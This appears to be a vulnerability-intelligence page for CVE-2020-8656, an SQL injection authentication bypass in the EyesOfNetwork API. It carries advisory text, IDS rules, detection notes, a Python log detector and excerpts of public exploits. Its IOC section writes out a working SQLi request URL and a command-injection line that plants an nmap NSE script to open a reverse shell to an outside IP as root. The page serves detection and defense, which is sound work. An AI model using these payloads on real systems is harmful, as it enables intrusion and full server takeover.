CVE-2020-8656
Published 2020-02-07
Priority: P190 · critical · CVSS 3.1: 9.8
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 84.60% (99.7th percentile)
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCs
url: /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
path: /eonapi/getApiKey
command: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Detect SQL injection auth bypass attempts against the EyesOfNetwork API by monitoring HTTP GET requests to /eonapi/getApiKey where the username parameter contains UNION SELECT keywords.
- The exploit uses a distinctive hardcoded MD5 hash value '1c85d47ff80b5ff2a4dd577e8e5f8e9d' in the UNION SELECT payload as the injected password field; presence of this string in HTTP URI parameters is a high-confidence indicator of exploitation.
- A time-based blind SQLi probe uses sleep() in the username parameter; monitor for HTTP 401 responses to /eonapi/getApiKey with anomalously long response times (>=6 seconds) as a detection signal.
- The exploit chain follows a predictable sequence: SQLi on /eonapi/getApiKey → POST to /eonapi/createEonUser → POST to /lilac/autodiscovery.php with a command-injected target[] parameter. Correlating these three endpoints in sequence from the same source IP is a strong indicator of full exploitation.
- The exploit uses a distinctive non-standard User-Agent string; alert on this UA in web server logs as an indicator of the public PoC tool being used.
- The command injection payload in the AutoDiscovery target field is prefixed with a semicolon and suffixed with a space and hash (;CMD #) to break out of the target context; monitor POST bodies to /lilac/autodiscovery.php for target[] values matching this pattern.
- Post-exploitation artifact: watch for creation of NSE script files in /tmp/ (e.g., /tmp/h4k) followed by execution of nmap with a -script flag pointing to /tmp/, indicating privilege escalation via the apache→root nmap sudo path.
- The Nuclei template uses a stop-at-first-match strategy: it first tries the auth-bypass UNION SELECT request and only falls back to the time-based sleep probe if the first request does not return EONAPI_KEY. The time-based probe uses a 6-second sleep with a 20-second timeout; tuning these thresholds may be needed in high-latency environments.
- The Metasploit module requires HTTPS (SSL: true) and defaults to port 443; running the module against HTTP-only targets will fail.
- The module attempts API key generation via hardcoded key first; only if that fails does it fall back to SQL injection. Detection rules should cover both the hardcoded-key path (CVE-2020-8657) and the SQLi path (CVE-2020-8656) to avoid blind spots.
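The detection notes above can be combined into one pass over web server access logs. The following is an added example, not code from any of the indexed sources: it assumes Apache combined-style log lines (which carry no POST bodies, so the target[] check is out of scope), and the function name, log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined-style); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27&password=x HTTP/1.1" 200 64
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "POST /eonapi/createEonUser HTTP/1.1" 200 80
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "POST /lilac/autodiscovery.php HTTP/1.1" 302 0
192.0.2.44 - - [01/Jan/2024:10:05:00 +0000] "GET /eonapi/getApiKey?username=a%20sleep(6)&password=x HTTP/1.1" 401 52
203.0.113.9 - - [01/Jan/2024:10:06:00 +0000] "GET /eonapi/getApiKey?username=monitor&password=x HTTP/1.1" 401 52
203.0.113.9 - - [01/Jan/2024:10:06:05 +0000] "POST /lilac/autodiscovery.php HTTP/1.1" 302 0
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
SQLI = re.compile(r"\b(?:union|select|sleep)\b", re.I)   # keywords named in the notes
POC_HASH = "1c85d47ff80b5ff2a4dd577e8e5f8e9d"            # MD5 value quoted on this page
CHAIN = ["/eonapi/getApiKey", "/eonapi/createEonUser", "/lilac/autodiscovery.php"]

def analyze(log_text):
    """Return (alerts, chain_ips): per-request alerts and IPs that walked all 3 endpoints."""
    alerts, stage = [], {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, method, target = m.groups()
        url = urlsplit(target)
        if url.path == CHAIN[0]:
            # parse_qs URL-decodes, so %27%20union%20select is matched as plain text
            user = " ".join(parse_qs(url.query).get("username", []))
            if SQLI.search(user):
                alerts.append((ip, "sqli-keyword"))
                stage[ip] = max(stage.get(ip, 0), 1)   # chain starts only after SQLi
            if POC_HASH in url.query:
                alerts.append((ip, "poc-hash"))
        elif method == "POST" and 1 <= stage.get(ip, 0) < len(CHAIN):
            # advance only when the next expected endpoint is hit, in order
            if url.path == CHAIN[stage[ip]]:
                stage[ip] += 1
    chain_ips = sorted(ip for ip, s in stage.items() if s == len(CHAIN))
    return alerts, chain_ips

if __name__ == "__main__":
    found, chained = analyze(SAMPLE_LOG)
    print("alerts:", found)
    print("full chain from:", chained)
```

A legitimate getApiKey call followed by an AutoDiscovery POST (the 203.0.113.9 lines) raises nothing, because the chain state only starts after an injection keyword is seen from that source.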
CVSS provenance
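| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |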
GHSA
GHSA-9vpp-5ch5-wr42: An issue was discovered in EyesOfNetwork 5
ghsa_unreviewed·2022-05-24
CVE-2020-8656 [HIGH] CWE-89 GHSA-9vpp-5ch5-wr42: An issue was discovered in EyesOfNetwork 5
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
VulnCheck
eyesofnetwork eyesofnetwork Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-8656 [CRITICAL] eyesofnetwork eyesofnetwork Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Affected: eyesofnetwork eyesofnetwork
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2020-8656; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-10&host_type=src&vulnerability=cve-2020-8656; https://dashboar
Suricata
ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)
suricata·2021-11-01·CVSS 9.8
CVE-2020-8657 [CRITICAL] ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Generate API Key SQLi (CVE-2020-8656)"; flow:established,to_server; http.uri; content:"/eonapi/getApiKey"; fast_pattern; content:"username="; nocase; startswith; pcre:"/^[^&=]*(?:union|select)/Ri"; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8657; reference:cve,2020-8656; classtype:attempted-admin; sid:2034310; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8656, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exp
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb·2020-03-05
CVE-2020-8657 EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
and prior in order to execute arbitrary commands as root.
This module takes advantage of a command injection vulnerability in the
`target` parameter of the AutoDiscovery functionality within the EON web
interface in order to write an Nmap NSE script containing the payload to
disk. It then starts an Nmap scan to activate the payload. This results in
privilege escalation because the`apache` user can execute Nm
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb·2020-02-07·CVSS 8.8
CVE-2020-8656 [HIGH] EyesOfNetwork 5.3 - Remote Code Execution
---
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-8654 [HIGH] EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:
id: CVE-2020-8654
info:
  name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
  author: praetorian-thendrickson
  severity: high
  description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
Nuclei
EyesOfNetwork - Hardcoded API Key & SQL Injection
nuclei·CVSS 9.8
CVE-2020-8656 [CRITICAL] EyesOfNetwork - Hardcoded API Key & SQL Injection
An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
Template:
id: CVE-2020-8656
info:
  name: EyesOfNetwork - Hardcoded API Key & SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
  impact: |
    Unauthenticated attackers can bypass authentication via SQL injection and
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the `apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html
- https://github.com/EyesOfNetworkCommunity/eonapi/issues/16